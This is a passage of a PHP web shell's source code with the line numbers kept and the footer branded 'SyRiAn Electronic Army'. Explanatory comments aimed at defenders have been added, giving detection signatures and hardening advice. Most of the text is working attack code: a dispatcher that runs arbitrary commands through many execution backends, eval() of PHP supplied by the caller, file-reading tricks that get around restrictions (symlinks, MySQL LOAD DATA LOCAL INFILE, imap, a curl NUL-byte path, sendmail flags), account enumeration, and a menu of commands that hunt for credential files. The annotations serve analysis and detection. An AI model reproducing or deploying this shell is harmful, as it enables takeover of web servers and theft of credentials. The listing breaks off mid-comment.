  572.      if ($dh = opendir($dir)) {
  573.         $f = readdir($dh);
  574.         while (($f = readdir($dh)) !== false) {
  575.             $dh2=opendir($dir."/");
  576.             $f2 = readdir($dh2);
  577.             while (($f2 = readdir($dh2)) !== false) {
  578.                 $f2.="/";
  579.                 $dh3=opendir($dir.$f.$f2);
  580.                 $f3 = readdir($dh3);
  581.                 while (($f3 = readdir($dh3)) !== false) {
  582.                     array_push($array,$f3);
  583.                 }
  584.             }
  585.         }
  586.         closedir($dh);
  587.         return $array;
  588.      } 
  589. }
  590. function GetUsers5(){
       // Returns the canonical path of /etc/passwd as resolved by realpath();
       // this is a path string, not the file's contents.
  591.     return realpath('/etc/passwd');
  592. }
  593. function ErrorLog($path){
       // Reads $path with file_get_contents() and routes the data through
       // error_log() message type 3 (append to a file) into a uniqid()-named
       // scratch file in the current directory, then reads the scratch file
       // back, deletes it and returns the contents.
       // Detection: short-lived files with 13-character hexadecimal names
       // appearing in a web directory.
  594.     $tempFile = uniqid();
  595.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  596.     error_log(file_get_contents($path), 3, $tempFile);
  597.     $content = file_get_contents($tempFile);
  598.     unlink($tempFile);
  599.     return $content;   
  600. }
  601. function SymlinkF($path) {
       // Creates a symlink with a uniqid() name in the current directory that
       // points at $path, reads the target through the link, removes the link
       // and returns the contents. Returns nothing when symlink() is missing.
       // Hardening: add symlink to disable_functions where unused, and have the
       // web server use SymLinksIfOwnerMatch rather than FollowSymLinks.
  602.     $tempFile = uniqid();
  603.     if(function_exists('symlink')) {
  604.         symlink($path,$tempFile);
  605.         $content = file_get_contents($tempFile);
  606.         unlink($tempFile);
  607.         return $content;
  608.     }
  609. }
  610. function MySQLReader($path) {
       // Reads a local file through the database client: connects with the
       // hard-coded $DBhost/$DBuser/$DBpass, creates database and table a.a,
       // loads $path with LOAD DATA LOCAL INFILE, prints each row followed by a
       // newline and drops the database. $path is concatenated into the SQL
       // text. Nothing is returned; a failed load ends the script via die().
       // Uses the legacy mysql_* extension (removed in PHP 7).
       // Detection: database audit logs showing CREATE DATABASE a / LOAD DATA
       // LOCAL INFILE issued by the web host.
       // Hardening: disable local_infile on server and client, give the
       // application account no CREATE privilege, never leave root/root valid.
  611.     global $DBhost,$DBuser,$DBpass;
  612.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  613.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  614.     mysql_query("CREATE DATABASE a");
  615.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  616.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  617.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  618.     $result = mysql_query("SELECT a FROM a.a");
  619.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  620.     mysql_query("DROP DATABASE a");
  621. }
  622. function MySQLIReader($path) {
       // mysqli variant of MySQLReader(): creates database and table a.a over a
       // legacy mysql_connect() link, then opens a mysqli connection with
       // MYSQLI_OPT_LOCAL_INFILE enabled and registers r() as the local-infile
       // handler, which prints each chunk it reads from the file. Nothing is
       // returned, and database a is not dropped afterwards, so a leftover
       // database named "a" is a forensic artefact worth checking for.
       // Hardening: same as for MySQLReader() - local_infile disabled and a
       // least-privilege database account.
  623.     global $DBhost,$DBuser,$DBpass;
  624.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  625.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  626.     mysql_query("CREATE DATABASE a");
  627.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  628.    
           // Declared inside the function body, so r() becomes a global function
           // the first time MySQLIReader() runs.
  629.     function r($fp, &$buf, $len, &$err) {
  630.       print fread($fp, $len);
  631.     }
  632.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  633.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  634.     $m->set_local_infile_handler("r");
  635.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  636.     $m->close();
  637. }
  638. function DBConnect($host,$user,$pass,$db) {
       // Opens a persistent legacy mysql connection and selects $db. Returns
       // false after echoing a message when either step fails (the connect
       // failure message includes the password), true otherwise. The second
       // return statement is unreachable, so the link is never handed back.
  639.     $connect = mysql_pconnect($host,$user,$pass);
  640.     if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
  641.     else {
  642.         $tryToSelectDB = mysql_select_db($db,$connect);
  643.         if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
  644.         else{return true; return $connect;}
  645.     }
  646. }
  647. function ReadId($path) {
       // Account enumeration without touching /etc/passwd: queries
       // posix_getpwuid() for every uid from 0 to 59999 and concatenates the
       // fields of each record found. $path is not used. The inner loop calls
       // eah(), which is not defined in the visible part of the listing.
       // Hardening: add the posix_* account functions to disable_functions
       // where the application does not need them.
  648.     for($uid=0;$uid<60000;$uid++) {  
  649.         $ara = posix_getpwuid($uid);
  650.         if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  651.         }
  652.     }
  653.     return $content;
  654. }
  655. function ImapF($path) {
       // Opens $path as a mailbox with empty credentials through the imap
       // extension and returns the body of message 1.
       // NOTE(review): presumably chosen because the imap extension opens local
       // files outside PHP's usual file-access checks - confirm.
       // Hardening: do not load the imap extension on hosts that do not need it.
  656.     $stream = imap_open($path, "", "");
  657.     $str = imap_body($stream, 1);
  658.     imap_close($stream);
  659.     return $str;
  660. }
  661. function FileF($path) {
       // Reads $path with file() and returns all lines joined into one string.
       // $content is appended to without being initialised first.
  662.     $lines = file($path); foreach($lines as $line){$content .= $line;}
  663.     return $content;
  664. }
  665. function CopyF($path) {
       // Copies $path to a scratch file named md5(uniqid()).".bb" in the
       // current directory, reads the copy, deletes it and returns the contents.
       // Detection: transient *.bb files with 32-character hexadecimal names
       // inside a web directory.
  666.     $tempFile = md5(uniqid()).".bb";
  667.     copy($path,$tempFile);
  668.     $content = file_get_contents($tempFile);
  669.     unlink($tempFile);
  670.     return $content;
  671. }
  672. function fgetssF($path) {
       // Calls fgetss() on $path in a loop and returns the concatenated result.
       // Not referenced by the dispatcher in the visible listing, which calls
       // fgetss() inline on an opened handle instead.
  673.     while(($line = fgetss($path)) != false){$content .= $line;}
  674.     return $content;
  675. }
  676. function highlightFile($path) {
       // Thin wrapper around highlight_file(). Called without the second
       // argument, highlight_file() prints the highlighted source itself and
       // returns a boolean, which is what this function hands back.
  677.     return highlight_file($path);
  678. }
  /**
   * mbSendEmail: uses the fifth argument of mb_send_mail(), which PHP appends to the
   * sendmail command line. "-C <path>" names $path as the mailer's configuration file and
   * "-X <file>" names a log file in the current directory; the function then reads that
   * log file back, deletes it and returns its content.
   * Returns nothing when mb_send_mail() is unavailable.
   * Detection: a sendmail-compatible binary started by the web server account with -C or
   * -X on its command line, and short-lived uniqid()-named files in the web root.
   * Hardening: disable mail() and mb_send_mail() where unused, or front the MTA with a
   * wrapper that refuses -C and -X from unprivileged callers.
   */
  679. function mbSendEmail($path) {
  680.     if(function_exists('mb_send_mail')) {
  681.         $tempFile = uniqid();
  682.         $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  683.         mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
  684.         $content = file_get_contents($tempFile);
  685.         unlink($tempFile);
  686.         return $content;
  687.     }
  688. }
  /**
   * DeleteFile: tries unlink() first; if that did not succeed it falls back to a shell
   * command through Exe() ("del" when $os is 'Windows', "rm -f" when it is 'Linux').
   * $fileName is interpolated into the command line without quoting.
   * Returns true or false from the truthiness of the last attempt. Exe() as shown in this
   * file echoes its output and has no return statement, so the fallback branch reports
   * false whatever the outcome.
   * Detection: rm or del spawned by the web server process.
   */
  689. function DeleteFile($fileName) {
  690.     global $os;
  691.     if(function_exists('unlink'))
  692.     {$delete = unlink($fileName);}
  693.     if((!$delete) && ($os == 'Windows'))
  694.     {$delete = Exe("del $fileName"); }
  695.     else if((!$delete) && ($os == 'Linux'))
  696.     {$delete = Exe("rm -f $fileName");}
  697.     if($delete){return true;}else{return false;}
  698. }
  /**
   * CurlFileRead: builds a file:// URL from $path, a NUL byte and this script's own path,
   * runs it through cURL and var_dump()s the result.
   * The NUL-plus-__FILE__ suffix looks like the historic trick of letting a path check see
   * an allowed file name while the C library stops at the NUL (inferred from the
   * construction; the page does not say which PHP versions it targets).
   * CURLOPT_RETURNTRANSFER is not set, so curl_exec() writes the body straight to the
   * output and var_dump() shows only the boolean result. The handle is never closed.
   * Static signature: "file://" concatenated with "\x00" and __FILE__ in a curl_init() call.
   */
  699. function CurlFileRead($path) {
  700.     $ch = curl_init("file://".$path."\x00".__FILE__);
  701.     var_dump(curl_exec($ch));
  702. }
  /**
   * FReadF: opens $path in 'r+' mode (read and write), reads from it and closes it.
   * filesize() is given the stream handle instead of the path, and the htmlspecialchars()
   * result is discarded, so the function neither returns nor prints anything.
   * The result of fopen() is not checked.
   */
  703. function FReadF($path) {
  704.     $file = fopen($path,'r+'); //Open The File
  705.     if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  706.     fclose($file);
  707. }
  /**
   * TempnameF: creates a temp file with prefix "cx" in the global $dir, copies $path into
   * it through the compress.zlib:// stream wrapper, reads the copy, HTML-escapes it (with
   * nl2br), deletes the temp file and returns the markup.
   * $filename is never assigned, so the two htmlspecialchars($filename) lines add nothing.
   * If copy() fails the function returns nothing and the empty tempnam() file stays behind.
   * Forensic artefact: files named cx* in the directory the operator was browsing.
   * Detection: compress.zlib:// used to read a plain local file is unusual in application code.
   */
  708. function TempnameF($path) {
  709.     global $dir;
  710.     $temp = tempnam($dir, "cx");
  711.     if(copy("compress.zlib://".$path, $temp)) {
  712.         $handler = fopen($temp, "r");
  713.         $readFile = fread($handler, @filesize($temp));
  714.         fclose($handler);
  715.         $content .= htmlspecialchars($filename);
  716.         $content .= nl2br(htmlspecialchars($readFile));
  717.         $content .= htmlspecialchars($filename);
  718.         unlink($temp);
  719.         return $content;
  720.     }  
  721. }
  /**
   * Evaluation: removes PHP opening and closing tags from $eval and passes the rest to
   * eval(), i.e. runs caller-supplied PHP in the context of this script (the caller is not
   * visible here; presumably the text comes from a request field).
   * Returns true only when the evaluated code itself returns a truthy value.
   * eval is a language construct, so disable_functions does not cover it. Static scanning
   * for eval() on request-derived data and keeping the web root non-writable for the
   * server account are the relevant controls.
   */
  722. function Evaluation($eval) {
  723.     $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  724.     $eval = eval($eval);
  725.     if($eval){return true;}else{return false;}
  726. }
  /**
   * Oracle: capability probe. Returns an HTML label, ON in red when ocilogon() exists and
   * OFF in green otherwise. Presumably rendered in the shell's status header together with
   * the other probes below (the caller is not visible in this section).
   */
  727. function Oracle() {
  728.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  729.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  730. }
  /**
   * MsSQL: capability probe. Returns the ON (red) / OFF (green) HTML label depending on
   * whether mssql_connect() exists.
   */
  731. function MsSQL() {
  732.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  733.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  734. }
  /**
   * MySQL2: capability probe. Returns the ON (red) / OFF (green) HTML label depending on
   * whether the legacy mysql_connect() exists; that function was removed in PHP 7.
   */
  735. function MySQL2() {
  736.     $mysql_try = function_exists('mysql_connect');
  737.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
  738.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  739. }
  /**
   * MSQL: capability probe. Returns the ON (red) / OFF (green) HTML label depending on
   * whether msql_connect() exists.
   */
  740. function MSQL() {
  741.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  742.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  743. }
  /**
   * MysqlI: capability probe. Returns the ON (red) / OFF (green) HTML label depending on
   * whether mysqli_connect() exists.
   */
  744. function MysqlI() {
  745.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  746.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  747. }
  /**
   * Gzip: capability probe. Returns the ON (red) / OFF (green) HTML label depending on
   * whether gzencode() exists.
   */
  748. function Gzip() {
  749.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  750.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  751. }
  /**
   * openBaseDir: reads the open_basedir ini value and returns OFF (green) when it is empty
   * and ON (red) when a restriction is configured. The configured paths themselves are
   * not returned.
   */
  752. function openBaseDir() {
  753.     $openBaseDir = ini_get("open_basedir");
  754.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  755.     else {$openBaseDir = '<font color="red">ON</font>';}   
  756.     return $openBaseDir;
  757. }
  /**
   * Curl: capability probe. Returns the ON (red) / OFF (green) HTML label depending on
   * whether the curl extension is loaded.
   */
  758. function Curl() {
  759.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  760.     else{$curl = '<font color="green">OFF</font>';}return $curl;
  761. }
  /**
   * magicQouts: reports magic_quotes_gpc as an ON (red) / OFF (green) HTML label.
   * When get_magic_quotes_gpc() does not exist, $mag stays unset and the result is OFF.
   */
  762. function magicQouts() {
  763.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  764.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  765.     else {$mag= '<font color="red">ON</font>';}return $mag;
  766. }
  /**
   * SafeMode: reads the safe_mode ini value and returns OFF (green) when it is falsy and
   * ON (red) otherwise. safe_mode was removed in PHP 5.4, so on current runtimes this
   * always reports OFF.
   */
  767. function SafeMode() {
  768.     $safe_mode = ini_get("safe_mode");
  769.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  770.     else {$safe_mode = '<font color="red">ON</font>';}
  771.     return $safe_mode;
  772. }
  /**
   * DisableFunctions: returns the raw disable_functions ini string, or a green NONE label
   * when the setting is empty. The list is returned unescaped.
   * Read together with Exe() in this file, the value shows which execution backends the
   * host has left available, which is why the policy has to cover all of them.
   */
  773. function DisableFunctions() {
  774.     $disfun = ini_get('disable_functions');
  775.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  776. }
  /**
   * RegisterGlobals: reports the register_globals ini value as an ON (red) / OFF (green)
   * HTML label. The setting was removed in PHP 5.4.
   */
  777. function RegisterGlobals() {
  778.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  779.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  780. }
  /**
   * GetRealIP: returns the first non-empty of the X-Forwarded-For, Client-IP and
   * REMOTE_ADDR environment values. The first two are request headers set by the client,
   * so the result is caller-controlled unless a trusted proxy overwrites them.
   * The names are written as bare constants, which PHP 8 rejects as undefined.
   */
  781. function GetRealIP() {
  782.     if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  783.     elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  784.     else {$ip=getenv(REMOTE_ADDR);}
  785.     return $ip;
  786. }
  /**
   * SelectCommand: echoes a <select id='alias'> of canned commands, one list for Windows
   * and one for everything else. `global $os` rebinds the name, so the $os argument passed
   * by the caller is ignored.
   * For defenders the option values are a ready list of post-compromise discovery activity
   * to alert on when the parent process is the web server or PHP worker: network and
   * service enumeration (netstat, net start, net user, net view, arp, ipconfig, systeminfo,
   * tasklist), SUID/SGID and world-writable searches with find, and lookups for
   * credential-bearing files (.htpasswd, service.pwd, .bash_history, .mysql_history,
   * .fetchmailrc, config and backup/dump files).
   * Keeping those files unreadable to the web server account limits what the searches return.
   */
  787. function SelectCommand($os) {
  788.     global $os;
  789.     if($os == 'Windows') {
  790.         echo "
  791.         <select name='alias' id='alias' onChange='AddAlias();' >
  792.         <option value=''>NONE</option> 
  793.         <option value='dir' >List Directory</option>
  794.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  795.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
  796.         <option value='netstat -an'>Show active connections</option>
  797.         <option value='net start'>Show running services</option>
  798.         <option value='tasklist'>Show Pro</option>
  799.         <option value='net user'>User accounts</option>
  800.         <option value='net view'>Show computers</option>
  801.         <option value='arp -a'>ARP Table</option>
  802.         <option value='ipconfig /all'>IP Configuration</option>
  803.         <option value='netstat -an'>netstat -an</option>
  804.         <option value='systeminfo'>System Informations</option>
  805.         <option value='getmac'>Get Mac Address</option>
  806.         </select>
  807.         ";
  808.     }
  809.     else {
  810.         echo "
  811.         <select name='alias' id='alias' onChange='AddAlias();' >
  812.         <option value=''>NONE</option> 
  813.         <option value='ls -la'>List dir</option>
  814.         <option value='cat /etc/hosts'>IP Addresses</option>
  815.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  816.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  817.         <option value='netstat -an | grep -i listen'>show opened ports</option>
  818.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  819.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  820.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  821.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  822.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  823.         <option value='find / -type f -name \"config*\"'>find config* files</option>
  824.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  825.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  826.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  827.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  828.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  829.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  830.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  831.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  832.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  833.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  834.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  835.         <option value='locate httpd.conf'>locate httpd.conf files</option>
  836.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  837.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  838.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  839.         <option value='locate my.conf'>locate my.conf files</option>
  840.         <option value='locate admin.php'>locate admin.php files</option>
  841.         <option value='locate cfg.php'>locate cfg.php files</option>
  842.         <option value='locate conf.php'>locate conf.php files</option>
  843.         <option value='locate config.dat'>locate config.dat files</option>
  844.         <option value='locate config.php'>locate config.php files</option>
  845.         <option value='locate config.inc'>locate config.inc files</option>
  846.         <option value='locate config.inc.php'>locate config.inc.php</option>
  847.         <option value='locate config.default.php'>locate config.default.php files</option>
  848.         <option value='locate config'>locate config* files </option>
  849.         <option value='locate \".conf\"'>locate .conf files</option>
  850.         <option value='locate \".pwd\"'>locate .pwd files</option>
  851.         <option value='locate \".sql\"'>locate .sql files</option>
  852.         <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  853.         <option value='locate \".bash_history\"'>locate .bash_history files</option>
  854.         <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  855.         <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  856.         <option value='locate backup'>locate backup files</option>
  857.         <option value='locate dump'>locate dump files</option>
  858.         <option value='locate priv'>locate priv files</option>
  859.         </select>
  860.         ";
  861.     }
  862. }
  /**
   * CSS: returns the page's <style> block plus four small JavaScript helpers as one string.
   * $sh3llColor is concatenated into the CSS unescaped (presumably the value set in the
   * configuration at the top of the file; the caller is not visible here).
   * The script part carries stable literals that work as static or response-body
   * signatures: element ids CMD_Line, alias, uploadInput and dir_mode, the upload field
   * name uploadfile[], and the query strings ?info=getPhpInfo and ?dir_mode=.
   */
  863. function CSS($sh3llColor) {
  864.     $css =  "
  865.     <style>
  866.     BODY
  867.     {
  868.         FONT-FAMILY: Verdana;
  869.         margin: 2;
  870.         background-color: #000000;
  871.         color:white;
  872.         font-size:10pt;
  873.     }
  874.     sy  
  875.     {
  876.         color:".$sh3llColor.";
  877.         font-size:7pt;
  878.     }
  879.     #Box
  880.     {
  881.         color:".$sh3llColor.";
  882.         background-color:#000;
  883.         font-size:14px;
  884.         font-weight:bold;
  885.  
  886.         border:none;
  887.     }
  888.     table
  889.     {
  890.         border:none;
  891.         BORDER:  #eeeeee  outset;
  892.         BACKGROUND-COLOR: #000000;
  893.         color: #cccccc;
  894.         font-size:10px;
  895.     }
  896.     tr
  897.     {
  898.         BORDER-RIGHT:  #cccccc 1px solid;
  899.         BORDER-TOP:    #cccccc 1px solid;
  900.         BORDER-LEFT:   #cccccc 1px solid;
  901.         BORDER-BOTTOM: #cccccc 1px solid;
  902.         color: #ffffff;
  903.     }
  904.     td
  905.     {
  906.         BORDER-RIGHT:  #cccccc 1px solid;
  907.         BORDER-TOP:    #cccccc 1px solid;
  908.         BORDER-LEFT:   #cccccc 1px solid;
  909.         BORDER-BOTTOM: #cccccc 1px solid;
  910.         color: #cccccc;
  911.     }
  912.  
  913.     input
  914.     {
  915.         BORDER-RIGHT:  ".$sh3llColor." 1px solid;
  916.         BORDER-TOP:    ".$sh3llColor." 1px solid;
  917.         BORDER-LEFT:   ".$sh3llColor." 1px solid;
  918.         BORDER-BOTTOM: ".$sh3llColor." 1px solid;
  919.         BACKGROUND-COLOR: #333333;
  920.         font: 9pt tahoma;
  921.         color: #ffffff;
  922.     }
  923.     select
  924.     {
  925.         BORDER-RIGHT:  #ffffff 1px solid;
  926.         BORDER-TOP:    #999999 1px solid;
  927.         BORDER-LEFT:   #999999 1px solid;
  928.         BORDER-BOTTOM: #ffffff 1px solid;
  929.         BACKGROUND-COLOR: #000000;
  930.         font: 9pt tahoma;
  931.         color: #CCCCCC;;
  932.     }
  933.     submit
  934.     {
  935.         BORDER:  1px outset buttonhighlight;
  936.         BACKGROUND-COLOR: #272727;
  937.         width: 40%;
  938.         color: #cccccc;
  939.     }
  940.     textarea
  941.     {
  942.         BORDER-RIGHT:  #ffffff 1px solid;
  943.         BORDER-TOP:    #999999 1px solid;
  944.         BORDER-LEFT:   #999999 1px solid;
  945.         BORDER-BOTTOM: #ffffff 1px solid;
  946.         BACKGROUND-COLOR: #333333;
  947.         color: #ffffff;
  948.     }
  949.     .Save{
  950.         width:500px;   
  951.         border-color:red;
  952.     }
  953.     A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  954.     A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  955.     A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  956.     A:hover {color:blue;TEXT-DECORATION: none;}
  957.     </style>
  958.     <script>
  959.     function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
  960.     function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  961.     function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
  962.     function change_dir_mode() {
  963.         var dir_mode = document.getElementById('dir_mode').value;
  964.         document.location = '?dir_mode='+dir_mode;
  965.     }
  966.     </script>
  967.     ";
  968.     return $css;
  969. }
  /**
   * filter: undoes magic-quotes escaping with stripslashes() when magic_quotes_gpc is on
   * and otherwise returns $string unchanged. Despite the name it performs no validation
   * or sanitisation. get_magic_quotes_gpc() was removed in PHP 8.
   */
  970. function filter($string) {
  971.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  972.     else{return $string;    }
  973. }
  /**
   * footer: echoes the closing table with the group name, a site link and a contact
   * address, then closes body and html. It returns nothing.
   * These branding strings are convenient match material for content scanning, but they
   * are copied freely between shells and are not evidence of who deployed the file.
   */
  974. function footer() {
  975.     echo '
  976.     <table width="100%">
  977.     <tr>
  978.     <td width="100%"><center>
  979.     <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
  980.     <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
  981.     <sy>  ~~<< </sy>sea.coders@hotmail.com<sy> >>~~</sy></b>
  982.     </center></td>
  983.     </tr>
  984.     </table>
  985.     </body></html>
  986.     ';
  987. }
  /**
   * print_exe_method: prints the <select name="exe_method"> that chooses the command
   * execution backend used by Exe(), pre-selecting the current $exec_method.
   * The Linux list offers eight backends; the other branch adds four Windows-specific ones.
   * The option values double as request indicators: a POST field named exe_method carrying
   * one of these strings is worth a rule in WAF or access-log review.
   */
  988. function print_exe_method() {
  989.     global $os; global $exec_method;
  990.     if($os == "Linux") {
  991.         ?>
  992.         <select name="exe_method" >
  993.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  994.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  995.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  996.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  997.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  998.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  999.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1000.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1001.         </select>
  1002.         <?php
  1003.     } else {
  1004.         ?>
  1005.         <select name="exe_method" >
  1006.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  1007.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  1008.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  1009.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  1010.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  1011.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  1012.             <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  1013.             <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  1014.             <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  1015.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1016.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1017.             <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  1018.         </select>
  1019.         <?php
  1020.     }
  1021. }
  /**
   * Exe: central command dispatcher. Runs $command (after filter(), which only strips
   * magic-quote slashes) through the backend named by the global $exec_method and echoes
   * whatever comes back; it has no return statement. An unrecognised $exec_method runs nothing.
   * The breadth of backends presumably exists so that blocking a single function does not
   * stop execution: a disable_functions policy has to list exec, system, shell_exec,
   * passthru, proc_open and popen together, and the extensions behind the perl, python,
   * ffi, win_shell_execute and win32_create_service branches should not be loaded on a
   * web-facing runtime.
   * The python branch splices $command into Python source between single quotes.
   * convert_cyr_string() in the popen branch was removed in PHP 8.
   * Detection: any shell or interpreter process whose parent is the web server or PHP worker.
   */
  1022. function Exe($command) {
  1023.     global $dir;global $os;global $exec_method;
  1024.     $command = filter($command);
  1025.    
  1026.     if($exec_method == "exec") {
  1027.         exec($command,$output);echo join("\n",$output);
  1028.     } else if($exec_method == "system") {
  1029.         system($command);
  1030.     } else if($exec_method == "shell_exec") {
  1031.         echo shell_exec($command);
  1032.     } else if($exec_method == "passthru") {
  1033.         passthru($command);
  1034.     } else if($exec_method == "proc_open") {
  1035.         echo proc_exec($command,$dir);
  1036.     } else if($exec_method == "popen") {
  1037.         $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  1038.     } else if($exec_method == "win_shell_execute") {
  1039.         echo winshell($command);
  1040.     } else if($exec_method == "win32_create_service") {
  1041.         echo srvshell($command);
  1042.     } else if($exec_method == "ffi") {
  1043.         echo ffishell($command);
  1044.     } else if($exec_method == "perl") {
  1045.         echo perlshell($command);
  1046.     } else if($exec_method == "python") {
  1047.         echo python_eval("import os\nos.system('".$command."')");
  1048.     } else if($exec_method == "slash_bypass") {
  1049.         echo slashBypass($command);
  1050.     }
  1051. }
  /**
   * proc_exec: starts $com with proc_open() in working directory $dir and returns
   * everything read from descriptor 1 (stdout). Descriptors 0 and 1 are both declared as
   * "w" pipes and stderr is not captured. The process handle is not checked, and neither
   * the pipes nor the process are closed.
   */
  1052. function proc_exec($com , $dir) {
  1053.     $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  1054.     $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  1055.     return stream_get_contents($pipes[1]);
  1056. }
  /**
   * winshell: runs "cmd.exe /C <command>" through win_shell_execute() with output
   * redirected to a file named NJ + uniqid() in the directory returned by whereistmP()
   * (defined outside this section), waits one second, reads the file, deletes it through
